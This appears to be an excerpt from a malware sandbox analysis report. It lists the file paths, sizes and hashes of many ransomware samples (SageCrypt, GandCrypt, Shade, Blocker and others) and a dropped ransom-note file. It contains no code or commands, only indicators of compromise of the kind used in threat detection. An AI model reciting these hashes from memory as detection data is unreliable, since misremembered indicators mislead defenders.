SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD537219fd2d09abee4189a1ae33de93e2d
SHA15e4cc26e169b6bd16843bcc86806556dac372c57
SHA2562a0d2418a2504ad14960dcff54f0892339eeed53e359585c9b04a29c4e6e4274
SHA512626b89eb5b132ac43a6fb2d5dcc1c62349a6a48045a486835aa51c17348b0c4849cf5d56b4b56359c7bab5bdccaa04adf659f7486de84f9c14d86032272e5069
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\[HOW_TO_DECRYPT_FILES].html
Filesize8KB
MD5fc77e293a409e088049d7b63d232aa9d
SHA174c32112c02be8b9dfadb80b287871bb0a912e78
SHA256fb31f111d2eb2aa8a9db5fe9f975b788d4955022f20b427a288ba8bf56204afe
SHA5123c9c4a2e461981b2b4e1206bcf4915efd48864c1fc1c2e4a944429c572c8bd6104c3f27040cca7b174dc933ca4ba7d91bfec5ea7d98c338a9986f5cc9ab74d78
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe
Filesize61KB
MD55164cc2c878c324665a73f6c57b25aa7
SHA11739c394f363222b05fc88580ee844cac101809b
SHA256eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68
SHA5125c3aef5ded42155ac9fc919f58ca1db5b866371fe7c604e79304aefada12519ae1315533dd7cfdfaebefefdd49b99c53c2a7963d3a3b68ee837ae07b8b01516b
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe
Filesize319KB
MD551788deded4adf8c0f2b73504ce9ef63
SHA1e506ac4936b2f54eb9f829170dbf3f51d889488a
SHA256bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73
SHA512ec2a72c9659da9392e181da5a7f17437d1c51383f6559ec990a0fac4f2f6a8238b9fda1f553f9f13e57cf89f2b065bdbc2fcbbc2dfb64d5701d72a4d48f6f3d9
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
Filesize736KB
MD5a5cf69f136de88f6826b2f97748fafc9
SHA1ee1ac69d7b988b6ba9a6f3dd533e1481590830aa
SHA256cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12
SHA5128ea33b830ac6e226c7a7b05ae50af459ab4d7b8cac02f82590f7634891ba4cb3c0614fe37dcb54e5f0943fd83e5f534aa0e036f91da984affaaa13f47cdcec89
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe
Filesize228KB
MD5d27af0f0b985470e2f74de936a5296c8
SHA1c9a3309e2a59d40fa2933dbb9e08850a3074878f
SHA256c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b
SHA512afb28e315fe782ff3fd04871ff343756afafae0f46cd42d4cb57bd45b5435982b1d90a167d10e3e042bea847904baacf4d141a70c878cee11cd8597c4733e195
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe
Filesize520KB
MD57dbd73bd2dac0cd58bffc7195471b1b8
SHA1e0a8fa034aad2d6f09173f02a9005accd7a516df
SHA256a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7
SHA51251a569a7fdc143760c078237a0e4889be8dbdf7883c92aed22a8c9f3feba4808223caab2ab7b0545467fca929dcbd18e179a3cc3a92db235a1b3d27806ab0106
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
Filesize962KB
MD5524565f13ff3b4726d9af906682226f8
SHA184160c88bc70240fffe7b1d922f1e155fe90c2a6
SHA25662dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972
SHA5129683792a15224a0c282e7d688136c497a6ed9e89b67804716c63fd96ce21ce1ee2fa7865eb7163d7cc08a21064be95257612c91efa55bc06123b9308238c17b2
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe
Filesize270KB
MD5ac1bcabcee9633da00138eee84362c1c
SHA196ef5e46a2cc94a1bd2ea753db9bb6c7a67c2590
SHA256f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5
SHA512010648ec40ab34dcede27c4f69c0aa7778c6c76b16bcc1c8175879b44de33b0f18183b8ffd30ee93f426e79b55eb82f395dfc87b07638fd79518fa72c6be7a6b
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe
Filesize92KB
MD50a9a769931b1ecddb4784e319ae58153
SHA15d25e90050a7a3c3469596a5d1cc6b3b039fc86d
SHA2564dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21
SHA51213faa057946b671a3a8f6c2946a69518bef5da40c687ab93f646cec96dc739b487ee23606c52ca4900108ae5c45fbafe630c2eb6f46ba3f1c366b1122470ab7c
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe
Filesize370KB
MD52aea3b217e6a3d08ef684594192cafc8
SHA13a0b855dd052b2cdc6453f6cbdb858c7b55762b0
SHA2560442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab
SHA512ea83fcb7465e48445f2213028713c4048ac575b9c2f7458a014c495bddb280be553a22b1056284efad7dd55c2a7837096755206581c67bb0183e4ac42160011a
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
Filesize472KB
MD5bb9aaa2733720ff5e84406e545ba7dcf
SHA117fa4e7924d70b68ec722a5d7ee71fd1225c26aa
SHA256083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b
SHA512e3ea2db54bc086eb754eb0d6b6702cd3a275cbdf165183822b68b68239cef549f615b0052df067e033ff9a04aee121cc8c6ef28659c5840288595338efdd90a0
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe
Filesize236KB
MD5db1675c74a444fd35383d9a45631cada
SHA119349ad4e8ed7bbb90c02482de2ba2655a3cc222
SHA256ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d
SHA51297946bfba8fa66b84e0994ec22a87f2e3e839e88e7c5baf758e71ac7644bad164e1d68ee965a819145ed4b5865de8de18664a066ad00a4f91799cd96ae6a7152
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
Filesize401KB
MD58bb4e48568645e3335a7b58e46c98969
SHA16f0a31ac97d0777e79113badad6b4e0ed64ab4a4
SHA2560b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9
SHA5126e101ac9277e78bcb121967317a9dbe99f4d1d9cf138e3e1a758062e6ca015fa89aabf9ef6324c1d88e4d6638e33baa1447e46cec608398048a7a44d1957dcf1
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe
Filesize937KB
MD5af6ba70303b9090aa036280fa6fe5420
SHA1d5b57b5289092908b9a31044270348c99ffc9d26
SHA2560218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac
SHA5128324a1a6e2f2471bdc501baef4233231a7836b1869c5ee45b71e8f4633eed66d26bfd1f7e3aa73756cd10d533c9355c7823b40d1534814cb094d2ba6c21f6f58
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe
Filesize89KB
MD5e3b25f81f0a21cfcda2848897c3734fd
SHA11e068334dd9a1b73dc4491cabbcfe2ce31579ee0
SHA256cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435
SHA512395ad7858574dbfa819d451194245099c6e6a129e9369ae1ff16b323e5918cf4f81467edef674494e0b128a650c6693e44bd9de2fb319bf8c7bf024b10e6bd39
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe
Filesize984KB
MD58140b27fcac93c639184c276a7302cec
SHA19547f1d5ff47b534db7ea1e3b98d8f0549670bc5
SHA25683c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484
SHA512bfc16ec3cc64eef3e604fb65fed75bc8b08a1e659405cb7a1513d750fdd0b40770e9cee5db501884b6eb544f8e3a6ee5372932fe257eea1114490470344d792c
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe
Filesize515KB
MD59b8b3ade510c30bc233a260a86a92e52
SHA1701f69fa4a63598b729506e903dfbe08d971beac
SHA25629e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e
SHA5129a9331fe2ab8cadccdabe808479b504b6fd57ab642ecea707ede03fb4a5438a42ddcfba19f5f9c071a0f24e89450f2cbddce14dd6607913b96d7bb5197bf6ccc
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe
Filesize187KB
MD5619d10780d59cbf6ddab9ed2f878a95d
SHA18ff9ae047ece2214e4e48d38557e3935b70306a8
SHA25689258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036
SHA512c8f37e4a1f735f108091348ff67ac887be43dbe780329cfd88fb96fa7dda4c1dbbedf060e0388e09c36808fd9132e8ebbf4e2e13f4581629d2830aa04676029d
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
Filesize356KB
MD58ea549207f2cf4741a4d5126a244a7d5
SHA177836e97741307385a155e21999ee7cec2d0113f
SHA2565a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8
SHA512c84f016c96806c88d28dc1894da91149578ecd4e0820699274aa74ed68fc2c01d0aa17067b6c919f2ee1e83fd133f21ef959ae1aaf8163809c9f75e06cd37de4
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
Filesize265KB
MD501ebc4ff8516afbd49f047776e789e7e
SHA15ed8b627522db5b29e41dd3a38eb0be6686c4cda
SHA2566030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6
SHA512847b75e851901365d991c94eddb66062e0af704031f9924a475de5b9250e9d9df750b2ebfb2099d832a4296b38f8bdc905b0ac7f8a5c5c61c1fa0b5eef62d26e
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
Filesize242KB
MD5e5334715014051c2c8de50756d5f4b46
SHA18caf8c0964920b417c37fd7ebeddbefd8f3193bd
SHA256cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2
SHA5126b3cd402077a6c1f1bd9b67f4f8aa1823ad6598491d169b12db9bdfc53abb12631e3978194a339750c35a1acbb6953ae982e5e0ca6eedacf64071e719c00bd77
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe
Filesize368KB
MD530ae661c12a27228f547661d64f39d10
SHA12826a56363b130c7a2c54c899c1388cd5c6145ea
SHA256943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c
SHA512d70034c645cde1313e8d95646c2ae4c4fc56055d8c3de5e35cfbe9ee34813318e9853baf01aa8fe95458f68bba41ad4164a4c5eb696193eea7262b727949eb76
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
Filesize355KB
MD59f9198d59d18e42d056ac48e8bab145e
SHA197993fe85cb85ebd364f7e4b1ed36e70a2e02d67
SHA256e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a
SHA512de9156d7d7411ba7aac01c382fdd91bba77cc58f7ee9947415a173db9c79faf28d0a29b43a4295a1f3b2e30249187bff144cb1849f37d6bdfb00c84b36c7ae51
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe
Filesize1.0MB
MD5d49935a05ab69ba7615779795f51584a
SHA156a744128b248c7cf91e74adab75ce1faedaf979
SHA2562b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82
SHA512c0027da133d0e85d638ea8f55ec7933e76e2ff504d5f54a7fc017ddbee864d44643055333347f96aa2325b23508b3d7a7679e6ef4abde986566fe626209a2cc9
-
C:\Users\Admin\Desktop\00361\UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe
Filesize97KB
MD5e02a14750102fc7850ebad6321203b19
SHA16775bc30d47a47fe4a7d258f635c000c4c6d9490
SHA2560f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556
SHA512a5b4a467fd2314e76a6de6dd7e4159c5db998e521f707c95443bdd09718431113989025ea57e8df4ae2e0b684e7395ffc7094a4cff6da532ad7d206f6ac97b23
-
C:\Users\Admin\Desktop\00361\VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe
Filesize95KB
MD5ab96bd64af2dd80a2b65c4eea38af4d8
SHA178ed01d643f28d701bda018fe7549d59c1e8167e
SHA2563e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1
SHA512270948bbb6d186dcc62c0f75db14a0192ad157211a31bda32c93e154ae67003142229325ccaafe67d0a857d7e762e12b97a9b5f34f2c2edc339285453840e7a4
-
Filesize
67KB
MD5f635fe3684b565f50f5cee86f6e8efb6
SHA19966885423a6d124cf6578ad3a37c2a094548b2d
SHA25640784ae7d4b8245edc93733ccdf74f198d1b0af067d5427aa750679fad21f479
SHA5122e216f51823343f104df18c42af3fa5be5a20b6a4db5203e03207befa46f39a53eb0bd62cbb979b3b546ed5c891d99c0ebba26eaeb8bcc4038091f62ce799842
-
Filesize
10KB
MD5f8e72269d580f570b879911ffc546e81
SHA1ad843f66b1cb748f506b1ccd16aab34f3092a27b
SHA2567546cefc827b32843aedba6c69fe3b84e6cbaee58898678d483f84ebc7befd06
SHA51289f39aa8e8d2a11f0ea3faa0381a08b6e0765f2a817d12651d18088d6df73ecaf26032eba327e49f941adba2ee4c92ab27a9284f588675adde54dee8e266a0fe
-
Filesize
33KB
MD58655c976adfd62b50a9ec8e6745ef46c
SHA134e1e62a89e891797ae03a598e884e6c9177d688
SHA256aadb92e0d175f2de6b76aa36b3b93dd55c7346a4cbd9e98848ff08f4ea0225e4
SHA5126dae28123863ad4e242d67d9af8ee0e396e3433f11af351c9e097ec57e757f9bda7fa6b5f310c62be464148b32d80998efd411f1a20516f909991b80278bc78d
-
Filesize
363KB
MD54a843a97ae51c310b573a02ffd2a0e8e
SHA1063fa914ccb07249123c0d5f4595935487635b20
SHA256727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086
SHA512905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2
-
Filesize
3KB
MD5ea8da282bb6be04d6abc876e64bf6e18
SHA1edbab61bcd01623539f0b73f7bf2d5fe6d7c6500
SHA2569e0ac5804947fc6b09929832b93d5b33168eeb57f89f3c984f680b3637857282
SHA5121bca5ca2767ee9dde9247667b839d2cf35024d65c401c4feb497e6222a69cb16597edc97276d27c97547f8d1b4180b75522d554d441ded4af1b6f891e718d617
-
Filesize
640B
MD55d142e7978321fde49abd9a068b64d97
SHA170020fcf7f3d6dafb6c8cd7a55395196a487bef4
SHA256fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061
SHA5122351284652a9a1b35006baf4727a85199406e464ac33cb4701a6182e1076aaff022c227dbe4ad6e916eba15ebad08b10719a8e86d5a0f89844a163a7d4a7bbf9
-
Filesize
1KB
MD5be7ae953aa597a78fe69ebac5190aacb
SHA1f9ea8486d9189d095155709401833dc4bbe4cebf
SHA25667627b3baf8436c143c11b3ee1a916d0f8cb2f838a5ecba738f3b99c1c8a249d
SHA5128c2fbf6443c4d6e93ac5669871100231f82024bfaaaaa2d7d3b9f3ee0ad2b2d01976b2655b95da288ea2b7ac0739d00d3b1fb5c31e7c02f355a215c70ad7d797
-
Filesize
217B
MD5c00d8433fe598abff197e690231531e0
SHA14f6b87a4327ff5343e9e87275d505b9f145a7e42
SHA25652fb776a91b260bf196016ecb195550cdd9084058fe7b4dd3fe2d4fda1b6470e
SHA512a71523ec2bd711e381a37baabd89517dff6c6530a435f4382b7f4056f98aff5d6014e85ce3b79bd1f02fdd6adc925cd3fc051752c1069e9eb511a465cd9908e1
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88